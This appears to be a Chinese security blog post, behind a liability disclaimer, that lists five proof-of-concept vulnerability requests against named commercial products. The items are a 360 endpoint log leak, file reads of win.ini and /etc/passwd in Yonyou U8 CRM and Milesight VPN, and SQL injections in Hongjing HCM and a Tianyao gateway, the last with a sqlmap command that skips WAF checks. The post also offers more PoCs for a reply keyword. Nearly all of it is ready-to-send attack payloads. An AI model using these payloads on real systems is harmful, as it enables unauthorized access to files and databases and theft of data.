免责声明
由于传播、利用湘安无事所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负
责,湘安无事及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除
并致歉。谢谢!
素颜(网安版)
0x01 360 新天擎终端安全管理系统信息泄露
url+/runtime/admin_log_conf.cache
0x02 用友U8 CRM 任意文件读取
url+/ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini
0x03 Milesight VPN server.js 任意文件读取漏洞
GET /../etc/passwd HTTP/1.1 Host: Accept: / Content-Type: application/x-www-form-urlencoded
0x04 宏景 codesettree SQL注入
GET /servlet/codesettree?categories=~31~27~20union~20all~20select~20~27hellohongjingHcm~27~2cdb~5fname~28~29~2d~2d&codesetid=1&flag=c&parentid=-1&status=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10 14 3) AppleWebKit/605.1.15 (KHTML.like Gecko) 5bGx5rW35LmL5YWz
Accept-Encoding: gzip, deflate
Connection: close
0x05 天钥安全网关前台SQL注入
POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1
Host:
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Language: zh-CN,zh;q=0.9
Cookie: ****
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
checkname=123&tagid=123
sqlmap -u "https://****/ops/index.php?c=Reportguide&a=checkrn" --data "checkname=123&tagid=123" -v3 --skip-waf --random-agent
上述漏洞POC已全部整理成文档,公众号后台回复"230814"即可领取!(或者加入下方免费星球领取)创建个2023护网蓝队交流群,人员超过200请添加下方wx拉取。
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...